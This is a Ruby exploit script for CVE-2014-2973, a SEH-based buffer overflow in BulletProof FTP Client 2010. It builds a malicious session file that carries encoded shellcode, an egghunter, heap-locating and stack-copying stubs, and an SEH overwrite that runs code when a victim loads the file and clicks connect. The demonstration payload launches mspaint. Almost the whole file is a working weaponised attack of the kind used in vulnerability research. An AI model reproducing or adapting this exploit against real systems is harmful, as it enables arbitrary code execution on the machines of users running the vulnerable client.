|
#!/usr/bin/env ruby
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit
# Date: Dec 03 2014
# Vulnerability Discovery: Gabor Seljan
# Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com>
# Software Link: http://www.bpftp.com/
# Version: 2010.75.0.76
# Tested on: Microsoft Windows XP SP3 EN [Version 5.1.2600]
# CVE: CVE-2014-2973
# Notes: bypass buffer size limitation for bigger payload. Allocate 2nd
# shellcode in heap and copy back to stack. This exploit use egghunter
# to locate 2nd shellcode in heap and copy to stack. Load the exploit file
# and click connect to trigger the exploit.
# Offset
seh = 93
filename = "xsession.bps"
buff = "A" * 500
# ./msfvenom -p windows/exec CMD=mspaint -b '\x00\x0a\x0d\x1a' -e x86/shikata_ga_nai -f ruby
heap_sc =
"w00tw00t" +
"\xda\xc4\xbf\xd7\xec\x92\xb5\xd9\x74\x24\xf4\x5d\x33\xc9" +
"\xb1\x32\x83\xed\xfc\x31\x7d\x16\x03\x7d\x16\xe2\x22\x10" +
"\x7a\x3c\xcc\xe9\x7b\x5f\x45\x0c\x4a\x4d\x31\x44\xff\x41" +
"\x32\x08\x0c\x29\x16\xb9\x87\x5f\xbe\xce\x20\xd5\x98\xe1" +
"\xb1\xdb\x24\xad\x72\x7d\xd8\xac\xa6\x5d\xe1\x7e\xbb\x9c" +
"\x26\x62\x34\xcc\xff\xe8\xe7\xe1\x74\xac\x3b\x03\x5a\xba" +
"\x04\x7b\xdf\x7d\xf0\x31\xde\xad\xa9\x4e\xa8\x55\xc1\x09" +
"\x08\x67\x06\x4a\x74\x2e\x23\xb9\x0f\xb1\xe5\xf3\xf0\x83" +
"\xc9\x58\xcf\x2b\xc4\xa1\x08\x8b\x37\xd4\x62\xef\xca\xef" +
"\xb1\x8d\x10\x65\x27\x35\xd2\xdd\x83\xc7\x37\xbb\x40\xcb" +
"\xfc\xcf\x0e\xc8\x03\x03\x25\xf4\x88\xa2\xe9\x7c\xca\x80" +
"\x2d\x24\x88\xa9\x74\x80\x7f\xd5\x66\x6c\xdf\x73\xed\x9f" +
"\x34\x05\xac\xf5\xcb\x87\xcb\xb3\xcc\x97\xd3\x93\xa4\xa6" +
"\x58\x7c\xb2\x36\x8b\x38\x4c\x7d\x91\x69\xc5\xd8\x40\x28" +
"\x88\xda\xbf\x6f\xb5\x58\x35\x10\x42\x40\x3c\x15\x0e\xc6" +
"\xad\x67\x1f\xa3\xd1\xd4\x20\xe6\xbc\xa9\xae\x68\x57\x20" +
"\x3b\x6b"
# badchar '\x00\x0a\x0d\x1a\xb1\x83\xb2'
# find 1st heap address
heap_addr =
"\x50" + # push eax
"\xbb\xaf\x77\x77\x77" + # mov ebx,777777afh
"\x81\xeb\x7f\x77\x77\x77" + # sub ebx,7777777f = 0x30 (TEB)
"\x64\x8b\x1b" + # mov ebx,dword ptr fs:[ebx]
"\xb9\x0f\x78\x77\x77" + # mov ebx,7777780Fh
"\x81\xe9\x7f\x77\x77\x77" + # sub ecx,7777777fh = 0x90 (PEB)
"\x8b\x1c\x0b" + # mov ebx,dword ptr [ebx+ecx]
"\x8b\x1b" # mov ebx,dword ptr [ebx]
egghunter =
"\x8b\xd3" + # mov edx,ebx
"\xeb\x05" + # jmp ___FCKpd___00x5 (#2)
"\x66\x81\xca\xff\x0f" + # or dx, 0xfff (#1)
"\x42" + # inc edx (#2)
"\x52" + # push edx
"\x6a\x02" + # push 2
"\x58" + # pop eax
"\xcd\x2e" + # int 0x2e
"\x3c\x05" + # cmp al,5
"\x5a" + # pop edx
"\x74\xef" + # je $-0xf (#1)
"\xb8\x77\x30\x30\x74" + # mov eax,0x74303077 (our tag 'w00t')
"\x8b\xfa" + # mov edi,edx
"\xaf" + # scasd eax, dword ptr es:[edi]
"\x75\xea" + # jne $-0x14 (#2)
"\xaf" + # scasd eax, dword ptr es:[edi]
"\x75\xe7" + # jne $-0x17 (#2)
copy_sc =
"\x58" + # pop eax
"\x05\x54\xf2\xff\xff" + # add eax,-3500
"\x89\xfe" + # mov esi,edi
"\x89\xc7" + # mov edi,eax
"\xb9\x61\x78\x77\x77" + # mov ecx,0x77777861
"\x81\xe9\x7f\x77\x77\x77" + # sub ecx,0x7777777f
"\xf2\xa4" + # rep movsb
"\xff\xe0" # jmp eax
stack_sc = heap_addr + egghunter + copy_sc
# GetPC
buff[1,2] = "\xd9\xeb" # fldpi
buff[3,5] = "\x9b\xd9\x74\x24\xf4" # fstenv [esp-0xc]
buff[8,1] = "\x58" # pop eax # pop esp into eax
# FixRet stub
buff[9,7] = "\xc7\x40\x44\x45\x45\x45\x45" # (1)
buff[16,7] = "\xc7\x40\x58\x45\x45\x45\x45" # (2) place holder for jmp
buff[23,7] = "\xc7\x40\x5c\x45\x45\x45\x45" # (3) place holder for ppr
buff[30,stack_sc.size] = stack_sc
# repair stack
buff[12,4] = buff[seh-24,4] # replace with original sc (1)
buff[19,4] = buff[seh-4,4] # replace with original sc (2)
buff[26,4] = buff[seh,4] # replace with original sc (3)
buff[seh-4,4] = "\xeb\xa6\x41\x41" # jmp $-166
buff[seh,4] = [0x72d11f39].pack('V').force_encoding("utf-8") # ppr : msacm32.drv only non-safeseh without null
bps =
"\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75" +
"\x6C\x6C\x65\x74\x50\x72\x6F\x6F\x66\x20\x46\x54" +
"\x50\x20\x43\x6C\x69\x65\x6E\x74\x20\x53\x65\x73" +
"\x73\x69\x6F\x6E\x2D\x46\x69\x6C\x65\x20\x61\x6E" +
"\x64\x20\x73\x68\x6F\x75\x6C\x64\x20\x6E\x6F\x74" +
"\x20\x62\x65\x20\x6D\x6F\x64\x69\x66\x69\x65\x64" +
"\x20\x64\x69\x72\x65\x63\x74\x6C\x79\x2E\x0D\x0A" +
buff + "\x0D\x0A\x61\x6E" +
"\x6F\x6E\x79\x6D\x6F\x75\x73\x0D\x0A" + heap_sc + "\x62\x70\x69" +
"\x63\x70\x6C\x6E\x6B\x69\x69\x62\x6D\x66\x65\x0D" +
"\x0A"
File.open(filename,"wb") do |fp|
fp.write(bps)
puts "Exploit file: #{filename} size: #{bps.size}"
fp.close
end
|